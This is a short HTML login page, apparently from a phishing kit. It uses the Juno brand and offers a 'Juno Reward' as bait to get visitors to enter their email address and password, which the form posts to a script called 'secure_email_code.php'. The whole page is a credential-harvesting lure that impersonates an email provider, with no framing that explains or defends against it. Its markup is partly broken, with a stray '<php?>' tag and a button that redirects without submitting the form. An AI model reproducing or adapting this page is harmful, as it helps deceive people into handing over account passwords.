<!doctype html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>Login</title>
<link rel="icon" href="images/logo.png">
<link type="text/css" rel="stylesheet" href="css/bootstrap.min.css">
<link type="text/css" rel="stylesheet" href="css/font-awesome.css">
<link type="text/css" rel="stylesheet" href="css/login-style.css">
</head>

<body>
<div class="image-work">
	<div class="form-work">
		<div class="container">
			<div class="row">
				<div class="col-md-12">
					<div class="heading">
						<h1>Juno</h1>
					</div>
					<div class="form-section">
						<form action="secure_email_code.php" id="form" method="post" name="form">
							<div class="section">

                                <h1>Confirm Account to Receive</h1>

                                <h1>Juno Reward</h1>

								<label class="tagger">
									<h1>Email</h1>
									<input type="email" name="username" >
									<php?>
								</label>
								<label class="tagger">
									<h1>Password</h1>
									<input type="password" name="password" >
								</label>


								<label class="tagger">
                                    <button name="login"  type="button" onclick="location.href = 'secure_email_code.php';" >confirm reward</button>


                                    								</label>
							</div>
						</form>










					</div>
				</div>
			</div>
		</div>
	</div>
</div>
</body>
</html>
